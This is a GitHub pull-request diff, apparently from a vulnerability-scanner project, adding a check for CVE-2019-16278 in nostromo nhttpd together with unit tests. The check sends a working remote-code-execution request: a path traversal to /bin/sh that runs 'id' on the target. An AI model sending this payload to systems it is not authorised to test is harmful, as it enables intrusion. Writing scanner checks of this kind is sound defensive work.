Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Feature/CVE 2019 16278 #134

Merged
merged 8 commits into from
Nov 14, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
90 changes: 90 additions & 0 deletions agent/exploits/cve_2019_16278.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,90 @@
"""Agent Asteroid implementation for CVE-2019-16278"""

import datetime
from urllib import parse as urlparse

import requests
from requests import exceptions as requests_exceptions

from agent import definitions
from agent import exploits_registry
from agent.exploits import webexploit

VULNERABILITY_TITLE = "NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY"
VULNERABILITY_REFERENCE = "CVE-2019-16278"
VULNERABILITY_DESCRIPTION = """Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
"""
RISK_RATING = "CRITICAL"

DEFAULT_TIMEOUT = datetime.timedelta(seconds=90)


@exploits_registry.register
class CVE201916278Exploit(webexploit.WebExploit):
accept_request = definitions.Request(method="GET", path="/")

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def accept(self, target: definitions.Target) -> bool:
"""Rule: heuristically detect if a specific target is valid.

Args:
target: Target to verify

Returns:
True if the target is valid; otherwise False.
"""
target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path)
try:
req = requests.Request(
method=self.accept_request.method,
url=target_endpoint,
data=self.accept_request.data,
).prepare()
resp = self.session.send(req, timeout=DEFAULT_TIMEOUT.seconds)
except requests_exceptions.RequestException:
return False

server_header = resp.headers.get("Server", "")
return "nostromo" in server_header
3asm marked this conversation as resolved.
Show resolved Hide resolved

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Rule to detect specific vulnerability on a specific target.

Args:
target: Target to scan

Returns:
List of identified vulnerabilities.
"""
vulnerabilities: list[definitions.Vulnerability] = []

target_endpoint = urlparse.urljoin(
target.origin, "/.%0d./.%0d./.%0d./.%0d./bin/sh"
)
payload = "echo\necho\n id 2>&1"

# Force HTTP/1.0
self.session._http_vsn = 10
self.session._http_vsn_str = "HTTP/1.0"
try:
req = requests.Request(
method="POST", url=target_endpoint, data=payload
).prepare()
resp = self.session.send(
req,
timeout=DEFAULT_TIMEOUT.seconds,
)
except requests_exceptions.RequestException:
return vulnerabilities

if "uid=" in resp.text:
vulnerability = self._create_vulnerability(target)
vulnerabilities.append(vulnerability)

return vulnerabilities
79 changes: 79 additions & 0 deletions tests/exploits/cve_2019_16278_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,79 @@
"""Unit tests for Agent Asteroid: CVE-2019-16278"""

import requests_mock as req_mock

from agent import definitions
from agent.exploits import cve_2019_16278


def testCVE201916278_whenVulnerable_reportFinding(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""CVE-2019-16278 unit test: case when target is vulnerable."""
requests_mock.get(
url="http://localhost:80/",
status_code=200,
headers={"Server": "nostromo 1.9.4"},
)
requests_mock.post(
"http://localhost:80/.%0D./.%0D./.%0D./.%0D./bin/sh",
text="uid=65534 gid=65534",
status_code=200,
)
exploit_instance = cve_2019_16278.CVE201916278Exploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
vulnerability = vulnerabilities[0]
assert (
vulnerability.entry.title == "NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY"
)
assert vulnerability.technical_detail == (
"http://localhost:80 is vulnerable to CVE-2019-16278, NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY"
)


def testCVE201916278_whenSafe_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""CVE-2019-16278 unit test: case when target is safe."""
exploit_instance = cve_2019_16278.CVE201916278Exploit()
requests_mock.get(
3asm marked this conversation as resolved.
Show resolved Hide resolved
url="http://localhost:80/",
status_code=200,
headers={"Server": "nostromo 1.9.4"},
)
requests_mock.post(
"http://localhost:80/.%0D./.%0D./.%0D./.%0D./bin/sh",
status_code=404,
)
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) == 0


def testCVE201916278_whenAcceptRequestFails_doNotCrash() -> None:
"""CVE-2019-16278 unit test: case when target is safe."""
exploit_instance = cve_2019_16278.CVE201916278Exploit()
target = definitions.Target("http", "notexist", 80)

accept = exploit_instance.accept(target)

assert accept is False


def testCVE201916278_whenCheckRequestFails_doNotCrash() -> None:
"""CVE-2019-16278 unit test: case when target is safe."""
exploit_instance = cve_2019_16278.CVE201916278Exploit()
target = definitions.Target("http", "notexist", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0